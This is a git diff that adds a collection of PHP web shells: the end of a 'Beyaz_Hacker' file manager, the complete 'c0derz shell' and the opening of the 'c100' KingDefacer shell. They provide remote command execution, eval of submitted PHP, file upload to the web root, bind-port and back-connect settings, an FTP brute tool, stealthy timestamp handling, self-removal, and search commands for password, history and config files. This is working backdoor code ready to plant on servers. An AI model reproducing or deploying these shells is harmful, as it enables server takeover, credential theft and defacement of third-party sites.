+'symlinked' => 'Symlink from "[%2]" to "[%1]" has been created.',
+'not_symlinked' => 'Symlink from "[%2]" to "[%1]" could not be created.',
+'permission_for' => 'Permission of "[%1]":',
+'permission_set' => 'Permission of "[%1]" was set to [%2].',
+'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
+'not_readable' => '"[%1]" can not be read.'
+		);
+
+	}
+
+}
+
+function getimage ($image) {
+	switch ($image) {
+	case 'file':
+		return base64_decode('R0lGODlhEQANAJEDAJmZmf///wAAAP///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
+	case 'folder':
+		return base64_decode('R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA');
+	case 'hidden_file':
+		return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
+	case 'link':
+		return base64_decode('R0lGODlhEQANAKIEAJmZmf///wAAAMwAAP///wAAAAAAAAAAACH5BAHoAwQALAAAAAARAA0AAAM5SArcrDCCQOuLcIotwgTYUllNOA0DxXkmhY4shM5zsMUKTY8gNgUvW6cnAaZgxMyIM2zBLCaHlJgAADsA');
+	case 'smiley':
+		return base64_decode('R0lGODlhEQANAJECAAAAAP//AP///wAAACH5BAHoAwIALAAAAAARAA0AAAIslI+pAu2wDAiz0jWD3hqmBzZf1VCleJQch0rkdnppB3dKZuIygrMRE/oJDwUAOwA=');
+	case 'arrow':
+		return base64_decode('R0lGODlhEQANAIABAAAAAP///yH5BAEKAAEALAAAAAARAA0AAAIdjA9wy6gNQ4pwUmav0yvn+hhJiI3mCJ6otrIkxxQAOw==');
+	}
+}
+
+function html_header () {
+	global $site_charset;
+
+	echo <<<END
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
+     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+
+<meta http-equiv="Content-Type" content="text/html; charset=$site_charset" />
+
+<title>Beyaz_Hacker.php</title>
+
+<style type="text/css">
+body { font: small sans-serif; text-align: center }
+img { width: 17px; height: 13px }
+a, a:visited { text-decoration: none; color: navy }
+hr { border-style: none; height: 1px; background-color: silver; color: silver }
+#main { margin-top: 6pt; margin-left: auto; margin-right: auto; border-spacing: 1px }
+#main th { background: #eee; padding: 3pt 3pt 0pt 3pt }
+.listing th, .listing td { padding: 1px 3pt 0 3pt }
+.listing th { border: 1px solid silver }
+.listing td { border: 1px solid #ddd; background: white }
+.listing .checkbox { text-align: center }
+.listing .filename { text-align: left }
+.listing .size { text-align: right }
+.listing th.permission { text-align: left }
+.listing td.permission { font-family: monospace }
+.listing .owner { text-align: left }
+.listing .group { text-align: left }
+.listing .functions { text-align: left }
+.listing_footer td { background: #eee; border: 1px solid silver }
+#directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left; padding: 3pt }
+#directory { background: #eee; border: 1px solid silver }
+#upload { padding-top: 1em }
+#create { padding-bottom: 1em }
+.small, .small option { font-size: x-small }
+textarea { border: none; background: white }
+table.dialog { margin-left: auto; margin-right: auto }
+td.dialog { background: #eee; padding: 1ex; border: 1px solid silver; text-align: center }
+#permission { margin-left: auto; margin-right: auto }
+#permission td { padding-left: 3pt; padding-right: 3pt; text-align: center }
+td.permission_action { text-align: right }
+#symlink { background: #eee; border: 1px solid silver }
+#symlink td { text-align: left; padding: 3pt }
+#red_button { width: 120px; color: #400 }
+#green_button { width: 120px; color: #040 }
+#error td { background: maroon; color: white; border: 1px solid silver }
+#notice td { background: green; color: white; border: 1px solid silver }
+#notice pre, #error pre { background: silver; color: black; padding: 1ex; margin-left: 1ex; margin-right: 1ex }
+code { font-size: 12pt }
+td { white-space: nowrap }
+</style>
+
+<script type="text/javascript">
+<!--
+function activate (name) {
+	if (document && document.forms[0] && document.forms[0].elements['focus']) {
+		document.forms[0].elements['focus'].value = name;
+	}
+}
+//-->
+</script>
+
+</head>
+<body>
+
+
+END;
+
+}
+
+function html_footer () {
+
+	echo <<<END
+</body>
+
+
+</html>
+END;
+
+}
+
+function notice ($phrase) {
+	global $cols;
+
+	$args = func_get_args();
+	array_shift($args);
+
+	return '<tr id="notice">
+	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
+</tr>
+';
+
+}
+
+function error ($phrase) {
+	global $cols;
+
+	$args = func_get_args();
+	array_shift($args);
+
+	return '<tr id="error">
+	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
+</tr>
+';
+
+}
\ No newline at end of file
diff --git a/php/c0derz shell [csh] v. 0.1.1 release.php b/php/c0derz shell [csh] v. 0.1.1 release.php
new file mode 100644
index 0000000..d3c1613
--- /dev/null
+++ b/php/c0derz shell [csh] v. 0.1.1 release.php	
@@ -0,0 +1,334 @@
+<?php
+/****************************************************************
+*
+*	.::[csh]::. //(.::[c0derz]::. web-shell) v. 0.1.1 release
+*			 ----------------------------
+*       c0ded by: [vINT 21h]
+*       URL: http://c0derz.org.ua
+*       e-mail: vint21h@c0derz.org.ua
+*       ICQ: 255577736
+*
+****************************************************************/
+
+/***************************************************************
+ *
+ *   This program is free software; you can redistribute it and/or modify
+ *   it under the terms of the GNU General Public License as published by
+ *   the Free Software Foundation; either version 2 of the License', or
+ *   ('at your option) any later version.
+ *
+ ****************************************************************/
+
+
+$self = $_SERVER['PHP_SELF'];
+$docr = $_SERVER['DOCUMENT_ROOT'];
+$achtung=1;
+//authentification
+$authentification = 1;
+$name='63a9f0ea7bb98050796b649e85481845';//root
+$pass='5cdbe638246729485a5eab6b93f170e2';//c0derz
+$caption="Enter your login and password";
+if ($authentification &&  (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || md5($HTTP_SERVER_VARS['PHP_AUTH_USER'])!=$name || md5($HTTP_SERVER_VARS['PHP_AUTH_PW'])!=$pass))
+{
+    header("WWW-Authenticate: Basic realm=\"$caption\"");
+    header("HTTP/1.0 401 Unauthorized");
+    exit("<BODY text=#000000 vLink=#000000 aLink=#000000 link=#000000 bgcolor=#888888><h1>Error 401</h1><h2>Unauthorized access!</h2>");
+}
+if($achtung)
+  error_reporting(E_ALL&~E_NOTICE);
+else
+  error_reporting(0);
+  //---------------------
+
+//get page generating time
+if (!function_exists("get_micro_time")) {
+ function get_micro_time() {
+  list($usec, $sec) = explode(" ", microtime());
+  return ((float)$usec + (float)$sec);
+ }
+}
+define("start_time",get_micro_time());
+$cshver="<a href=http://c0derz.org.ua target='_BLANK' title='.::[c0derz shell]::.'><b>.::[csh]::.</b></a> v. 0.1.1 release";
+ //-------------------------------
+
+ //normalize text encoding
+ function decode($buffer){
+return  convert_cyr_string ($buffer, 'd', 'w');
+}
+//---------------------------------
+
+?>
+
+<HTML>
+<HEAD>
+<meta http-equiv='pragma' content='no-cache'>
+
+<?php
+echo "<TITLE>.:[csh]:.| [".get_current_user()."@".$SERVER_NAME."]</TITLE>";
+?>
+
+<STYLE>
+BODY{scrollbar-base-color: 000000;
+          scrollbar-face-color: #aaaaaa;
+          scrollbar-highlight-color: #dddddd;
+          scrollbar-shadow-color: #544554;
+          scrollbar-dark-shadow-color: #111111;
+          scrollbar-track-color: #222222;
+          scrollbar-arrow-color: #dcdddc}
+
+a:visited { color: #dcdcdc; text-decoration: none}
+A:active { color: #dcdcdc; text-decoration: none; }
+a:link {  color: #dcdcdc; text-decoration: none}
+a:hover {  color: #ff3333; text-decoration: none}
+
+BODY {
+scrollbar-face-color: transparent;
+scrollbar-shadow-color: transparent;
+scrollbar-highlight-color: transparent;
+scrollbar-3dlight-color: transparent;
+scrollbar-darkshadow-color: transparent;
+scrollbar-track-color: #777777;
+scrollbar-arrow-color: #777777;
+}
+</STYLE>
+</HEAD>
+<BODY text=#000000 vLink=#000000 aLink=#000000 link=#000000 bgcolor=#888888>
+<DIV align=center>
+<TABLE bordercolor=#000000 cellSpacing=1 width=950 bgColor=#000000 border=0 height=600>
+<hr>
+<table width=950>
+<tr>
+  <td style="border: 1 solid #000000" bgcolor="677667">
+<font size="1" face="verdana" color="#000000">
+<left>
+ <table width=100%>
+<tr>
+  <td style="border: 1 solid #000000" bgcolor="555555" >
+  <font size="1" face="verdana" color="#000000">
+
+<?php
+echo "<font size=1 face=verdana color=fcfcfc><b>Server info:</b></font><br>";
+?>
+
+ </td>
+ </tr>
+ </table>
+
+<?php
+//server info
+echo "Server name: <b><font color=#dcdcdc>".$SERVER_NAME."</b></font><br>";
+echo "Server IP adress:<b><font color=#dcdcdc>".$server_ip=gethostbyname($SERVER_NAME)."</b></font> <br>";
+echo (($safe_mode)?("Safe Mode: <font color=#ffffff><b>ON</b></font><br> "):
+         ("Safe Mode: <font color=#555555><b>OFF</b></font><br> "));
+echo "OS: <font color=#dcdcdc>";
+ if (empty($uname)){
+  echo (php_uname()."</font><br>");
+ }else
+  echo $uname."</font><br>";
+  echo 'User: <font color=#dcdcdc>' .get_current_user() . '</font><br>';
+   echo "HTTP Server: <font color=#dcdcdc>".$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE']."</font><br>";
+ echo ("PHP: <font color=#dcdcdc>".phpversion()."</font><br> ");
+  echo ("MySQL: ");
+ if($mysql_stat=function_exists('mysql_connect')){
+  echo "<font color=#ffffff><b>ON</b> </font><b>";
+ }
+ else {
+  echo "<font color=#555555><b>OFF</b> </font><br>";
+ }
+ //---------------------------
+ ?>
+
+ </td>
+ </tr>
+ </table>
+<tr>
+<td width="100" bgcolor="555555" valign="top">
+<center>
+<font face="tahoma" size="1" color="#000000"><div align="center"><b>.::[Shell functions]::.</b></div></font>
+<font style="font: 11px/14px verdana, arial, sans-serif; color: #554455;">
+<table width=100%>
+<tr>
+  <td style="border: 1 solid #000000" bgcolor="888888" onmouseover="this.style.backgroundColor='#677667';" onmouseout="this.style.backgroundColor='#888888';">
+ <font style="font: 11px/14px verdana, arial, sans-serif; color: #554455;">
+<a href="<?php echo $PHP_SELF."?mode=shell"?>" title="./$shell"><b>./ $shell</b></a><br>
+</td>
+ </tr>
+ </table>
+<table width=100%>
+<tr>
+  <td style="border: 1 solid #000000" bgcolor="677667" onmouseover="this.style.backgroundColor='#888888';" onmouseout="this.style.backgroundColor='#677667';">
+ <font style="font: 11px/14px verdana, arial, sans-serif; color: #554455;">
+<a href="<?php echo $PHP_SELF."?mode=phpcode"?>" title="PHP code execution">./php execution</a><br>
+</td>
+ </tr>
+ </table>
+ <table width=100%>
+<tr>
+  <td style="border: 1 solid #000000" bgcolor="677667" onmouseover="this.style.backgroundColor='#888888';" onmouseout="this.style.backgroundColor='#677667';">
+ <font style="font: 11px/14px verdana, arial, sans-serif; color: #554455;">
+<a href="<?php echo $PHP_SELF."?mode=upload"?>" title="Upload file to server">./ upload file</a><br>
+</td>
+ </tr>
+ </table>
+</div>
+<br>
+<br>
+<br>
+<br>
+<br>
+<td bgcolor="555555" valign="top" >
+<center>
+<div style="margin-top: 5;">
+<table width="98%" cellpadding="1" cellspacing="0">
+<tr>
+  <td style="border: 1 solid #000000" bgcolor="555555" >
+<font size="1" face="verdana" color="#fcfcfc">
+<b><?php echo$head_text;?><b>
+<tr>
+<td colspan="3" bgcolor="#677667" style="border-left: 1 solid #000000" style="border-bottom: 1 solid #000000" style="border-right: 1 solid #000000">
+<font face="Verdana" size="2" color="#000000">
+<br>
+<?php
+
+if (!empty($_GET['mode'])) {$mode = $_GET['mode'];}
+elseif (!empty($_POST['mode'])) {$mode = $_POST['mode'];}
+else {$mode = "shell";}
+
+switch($mode) {
+
+case "shell":
+$foot_stat="Current directory: <b><font color=#dcdcdc>[".getcwd()."]</font></b></tr>";
+$head_text="Shell:";
+chdir($dir);
+
+function execute($com)
+{
+
+ if (!empty($com))
+ {
+  if(function_exists('exec'))
+   {
+    exec($com,$arr);
+   echo implode('
+',$arr);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    echo shell_exec($com);
+   }
+  elseif(function_exists('system'))
+{
+    echo system($com);
+}
+  elseif(function_exists('passthru'))
+   {
+    echo passthru($com);
+   }
+}
+
+}
+if ($cmd){
+
+if($sertype == "winda"){
+ob_start();
+execute($cmd);
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+else{
+ob_start();
+echo decode(execute($cmd));
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+if (trim($buffer)){
+echo "<center><table width=100%><tr><td style=\"border: 1 solid \"000000\" \"bgcolor=677667\"><font size=\"1\" face=\"verdana\" color=\"#000000\">Executed command: <b><font color=#dcdcdc>[$cmd]</font></b></form></td></tr></table></center><left><textarea cols=200 rows=40 style=\"margin-left: 3; background-color: 555555; font-family: Tahoma; color: 000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\">";
+echo decode($buffer);
+echo "</textarea></center></div>";
+}
+}
+echo "<table width=100%><tr><td style=\"border: 1 solid \"000000\" \"bgcolor=677667\"><font size=\"1\" face=\"verdana\" color=\"#000000\">
+<form action=\"$REQUEST_URI\" method=\"POST\">
+<table><tr><td><font size=1 face=verdana color=000000>[".get_current_user()."@".$SERVER_NAME."]: </font><INPUT type=\"text\" name=\"cmd\" size=50 value=\"$cmd\" style=\"margin-left: 3; background-color: 555555; font-family: Tahoma; color: 000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></td></tr></table>
+<table><tr><td><font size=1 face=verdana color=000000>Current directory: </font><INPUT type=\"text\" name=\"dir\" size=50 value=\"";
+echo getcwd();
+echo "\"style=\"margin-left: 3; background-color: 555555; font-family: Tahoma; color: 000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\">
+<INPUT type=\"submit\" value=\"Change directory =>\" id=input style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></td></tr></table></form></td></tr></table>";
+break;
+case "phpcode":
+$head_text="PHP code execution:";
+echo "<center><table width=100%><tr><td style=\"border: 1 solid \"000000\" \"bgcolor=677667\"><font size=\"1\" face=\"verdana\" color=\"#000000\"><b>PHP code:</b></td></tr></table><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=200 rows=40 style=\"margin-left: 3; background-color: 555555; font-family: Tahoma; color: 000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></textarea><br><br>
+<input type=\"submit\" name=\"submit\" value=\"                                     Execute PHP code =>                                     \" id=input style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></form></center></div>";
+echo "<center><table width=100%><tr><td style=\"border: 1 solid \"000000\" \"bgcolor=677667\"><font size=\"1\" face=\"verdana\" color=\"#000000\"><center><b>Results of PHP execution:</b></center>";
+@eval(stripslashes($_POST['phpcode']));
+echo "</td></tr></table></center>";
+break;
+case "upload":
+echo"<table width=100%><tr><td style=\"border: 1 solid \"000000\" \"bgcolor=677667\"><font size=\"1\" face=\"verdana\" color=\"#000000\">
+<table>
+<font size=\"1\" face=\"verdana\" color=\"#000000\">
+<form enctype=\"multipart/form-data\" action=\"$self\" method=\"POST\">
+<input type=\"hidden\" name=\"mode\" value=\"upload\">
+<tr>
+<td><font size=\"1\" face=\"verdana\" color=\"#000000\">File:</font></td>
+<td><input size=\"48\" name=\"file\" type=\"file\" style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></td>
+</tr>
+<tr>
+<td><font size=\"1\" face=\"verdana\" color=\"#000000\">Path:</font></td>
+<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\" style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"><input type=\"submit\" value=\"Send\" style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></td></tr></form></font></table></td></tr></table>";
+if (isset($_POST['path'])){
+$uploadfile = $_POST['path'].$_FILES['file']['name'];
+if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
+echo"<table width=100%><tr><td style=\"border: 1 solid \"000000\" bgcolor=\"888888\"><font size=\"1\" face=\"verdana\" color=\"#000000\">";
+if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
+    echo "File sucessfuly uploaded in to directory: <font color=ffffff>[$uploadfile]</font><br>";
+    echo "Name: <font color=ffffff>[".$_FILES['file']['name']. "]</font><br>";
+    echo "Size: <font color=ffffff>[" .$_FILES['file']['size']. "]</font> Bytes<br>";
+} else {
+    print "Couldn't to upload file. Information:<br>";
+    print_r($_FILES);
+}
+echo"</td></tr></table>";
+}
+break;
+}
+?>
+
+ </tr>
+  </td>
+ </tr>
+<tr>
+  <td style="border: 1 solid #000000" bgcolor="555555" >
+<font size="1" face="verdana" color="#000000"><?echo $foot_stat;?>
+<tr>
+  <td style="border: none bgcolor="555555">
+<font size="1" face="verdana" color="#fcfcfc">
+<br>
+ <tr>
+<tr>
+  <td style="border: none bgcolor="555555">
+<font size="1" face="verdana" color="#fcfcfc">
+<br>
+ </tr>
+</table>
+</div>
+</td>
+</tr>
+</table>
+<table width=950>
+<tr>
+  <td style="border: 1 solid #000000" bgcolor="677667" >
+<font size="1" face="verdana" color="#000000">
+<center>
+
+<?php
+echo "-=[".$cshver." | Page generation time: <font color=#fcfcfc>[<b>".round(get_micro_time()-start_time,4). "</b>]</font> seconds.]=-";
+?>
+
+ </td>
+ </tr>
+ </table>
+</BODY>
+</HTML>
\ No newline at end of file
diff --git a/php/c100.php b/php/c100.php
new file mode 100644
index 0000000..e13b1b2
--- /dev/null
+++ b/php/c100.php
@@ -0,0 +1,3145 @@
+<?php
+//Starting calls
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+error_reporting(5);
+@ignore_user_abort(TRUE);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+define("starttime",getmicrotime());
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
+
+$shver = "KingDefacer was here"; //Current version
+//CONFIGURATION AND SETTINGS
+if (!empty($unset_surl)) {setcookie("KingDefacer_surl"); $surl = "";}
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("KingDefacer_surl",$surl);}
+else {$surl = $_REQUEST["KingDefacer_surl"]; //Set this cookie for manual SURL
+}
+
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
+
+if ($surl_autofill_include and !$_REQUEST["KingDefacer_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
+if (empty($surl))
+{
+ $surl = "?".$includestr; //Self url
+}
+$surl = htmlspecialchars($surl);
+
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
+
+
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
+$login_txt = "Restricted area"; //http-auth message.
+$accessdeniedmess = " kira v. ".$shver.": access denied";
+
+$gzipencode = TRUE; //Encode with gzip?
+
+$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)
+
+$KingDefacer_updateurl = "http://alturks.com/kira//update/"; //Update server
+$KingDefacer_sourcesurl = "http://alturks.com/kira/"; //Sources-server
+
+$filestealth = TRUE; //if TRUE, don't change modify- and access-time
+
+$donated_html = "<center><b>Owned by KingDefacer</b></center>";
+/* If you publish free shell and you wish
+add link to your site or any other information,
+put here your html. */
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
+
+$curdir = "./"; //start folder
+//$curdir = getenv("DOCUMENT_ROOT");
+$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
+$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
+
+$log_email = "jo1n@live.com"; //Default e-mail for sending logs
+
+$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
+$sort_save = TRUE; //If TRUE then save sorting-position using cookies.
+
+// Registered file-types.
+//  array(
+//   "{action1}"=>array("ext1","ext2","ext3",...),
+//   "{action2}"=>array("ext4","ext5","ext6",...),
+//   ...
+//  )
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+
+// Registered executable file-types.
+//  array(
+//   string "command{i}"=>array("ext1","ext2","ext3",...),
+//   ...
+//  )
+//   {command}: %f% = filename
+$exeftypes  = array(
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+ "perl %f%" => array("pl","cgi")
+);
+
+/* Highlighted files.
+  array(
+   i=>array({regexp},{type},{opentag},{closetag},{break})
+   ...
+  )
+  string {regexp} - regular exp.
+  int {type}:
+0 - files and folders (as default),
+1 - files only, 2 - folders only
+  string {opentag} - open html-tag, e.g. "<b>" (default)
+  string {closetag} - close html-tag, e.g. "</b>" (default)
+  bool {break} - if TRUE and found match then break
+*/
+$regxp_highlight  = array(
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
+  array("config.php",1) // example
+);
+
+$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
+ // array (i=>{letter} ...); string {letter} - letter of a drive
+//$safemode_diskettes = range("a","z");
+$hexdump_lines = 8;// lines in hex preview file
+$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
+
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd
+
+$bindport_pass = "KingDefacer";  // default password for binding
+$bindport_port = "31373"; // default port for binding
+$bc_port = "31373"; // default port for back-connect
+$datapipe_localport = "8081"; // default port for datapipe
+
+// Command-aliases
+if (!$win)
+{
+ $cmdaliases = array(
+  array("-----------------------------------------------------------", "ls -la"),
+  array("find all suid files", "find / -type f -perm -04000 -ls"),
+  array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
+  array("find all sgid files", "find / -type f -perm -02000 -ls"),
+  array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
+  array("find config.inc.php files", "find / -type f -name config.inc.php"),
+  array("find config* files", "find / -type f -name \"config*\""),
+  array("find config* files in current dir", "find . -type f -name \"config*\""),
+  array("find all writable folders and files", "find / -perm -2 -ls"),
+  array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
+  array("find all service.pwd files", "find / -type f -name service.pwd"),
+  array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
+  array("find all .htpasswd files", "find / -type f -name .htpasswd"),
+  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
+  array("find all .bash_history files", "find / -type f -name .bash_history"),
+  array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
+  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
+  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
+  array("list file attributes on a Linux second extended file system", "lsattr -va"),
+  array("show opened ports", "netstat -an | grep -i listen")
+ );
+}
+else
+{
+ $cmdaliases = array(
+  array("-----------------------------------------------------------", "dir"),
+  array("show opened ports", "netstat -an")
+ );
+}
+
+$sess_cookie = "KingDefacervars"; // Cookie-variable name
+
+$usefsbuff = TRUE; //Buffer-function
+$copy_unset = FALSE; //Remove copied files from buffer after pasting
+
+//Quick launch
+$quicklaunch = array(
+ array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),
+ array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
+ array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
+ array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
+ array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""),
+ array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
+ array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
+ array("<b>Encoder</b>",$surl."act=encoder&d=%d"),
+ array("<b>Tools</b>",$surl."act=tools&d=%d"),
+ array("<b>Proc.</b>",$surl."act=processes&d=%d"),
+ array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),
+ array("<b>Sec.</b>",$surl."act=security&d=%d"),
+ array("<b>SQL</b>",$surl."act=sql&d=%d"),
+ array("<b>PHP-code</b>",$surl."act=eval&d=%d"),
+ array("<b>Update</b>",$surl."act=update&d=%d"),
+ array("<b>Feedback</b>",$surl."act=feedback&d=%d"),
+ array("<b>Self remove</b>",$surl."act=selfremove"),
+ array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
+);
+
+//Highlight-code colors
+$highlight_background = "#c0c0c0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["KingDefacercook"]);
+
+//END CONFIGURATION
+
+
+// \/Next code isn't for editing\/
+@set_time_limit(0);
+$tmp = array();
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://google.com/releases/ckira\">kira</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
+if (!empty($login))
+{
+ if (empty($md5_pass)) {$md5_pass = md5($pass);}
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
+ {
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
+  header("WWW-Authenticate: Basic realm=\"kira ".$shver.": ".$login_txt."\"");
+  header("HTTP/1.0 401 Unauthorized");
+  exit($accessdeniedmess);
+ }
+}
+if ($act != "img")
+{
+$lastdir = realpath(".");
+chdir($curdir);
+if ($selfwrite or $updatenow) {@ob_clean(); KingDefacer_getupdate($selfwrite,1); exit;}
+$sess_data = unserialize($_COOKIE["$sess_cookie"]);
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+
+$disablefunc = @ini_get("disable_functions");
+if (!empty($disablefunc))
+{
+ $disablefunc = str_replace(" ","",$disablefunc);
+ $disablefunc = explode(",",$disablefunc);
+}
+
+if (!function_exists("KingDefacer_buff_prepare"))
+{
+function KingDefacer_buff_prepare()
+{
+ global $sess_data;
+ global $act;
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ $sess_data["copy"] = array_unique($sess_data["copy"]);
+ $sess_data["cut"] = array_unique($sess_data["cut"]);
+ sort($sess_data["copy"]);
+ sort($sess_data["cut"]);
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+}
+}
+KingDefacer_buff_prepare();
+if (!function_exists("KingDefacer_sess_put"))
+{
+function KingDefacer_sess_put($data)
+{
+ global $sess_cookie;
+ global $sess_data;
+ KingDefacer_buff_prepare();
+ $sess_data = $data;
+ $data = serialize($data);
+ setcookie($sess_cookie,$data);
+}
+}
